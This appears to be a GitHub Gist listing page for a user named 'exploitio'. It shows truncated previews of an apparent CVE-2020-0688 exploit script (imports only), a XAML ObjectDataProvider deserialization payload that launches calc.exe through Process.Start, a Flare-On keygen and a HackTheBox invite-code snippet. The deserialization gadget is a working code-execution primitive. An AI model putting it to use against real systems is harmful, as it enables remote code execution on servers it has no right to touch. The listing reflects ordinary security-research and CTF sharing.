Skip to content

Instantly share code, notes, and snippets.

View cve-2020-0688.py
# encoding: UTF-8
import requests
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote
urllib3.disable_warnings()
View 01-Deserialized-Process-Exec.xml
<ResourceDictionary
xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation""
xmlns:x=""http://schemas.microsoft.com/winfx/2006/xaml""
xmlns:System=""clr-namespace:System;assembly=mscorlib""
xmlns:Diag=""clr-namespace:System.Diagnostics;assembly=system"">
<ObjectDataProvider x:Key="""" ObjectType = ""{ x:Type Diag:Process}"" MethodName = ""Start"" >
<ObjectDataProvider.MethodParameters>
"calc.exe"
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
@exploitio
exploitio / keygen.cs
Last active Nov 29, 2019
Flare On Challenge 1 - Memecat Battlestation
View keygen.cs
using System;
using System.Linq;
namespace keygens
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("KEY: " + generateString());
@exploitio
exploitio / htb-invitecode-beautify.js
Last active Nov 6, 2019
HACKTHEBOX.EU Generate Invite Code
View htb-invitecode-beautify.js
function verifyInviteCode(code) {
var formData = {
"code": "YLPWT-OHRVC-*****-*****-*****"
};
$.ajax({
type: "POST",
dataType: "json",
data: formData,
url: '/api/invite/verify',
success: function(response) {
You can’t perform that action at this time.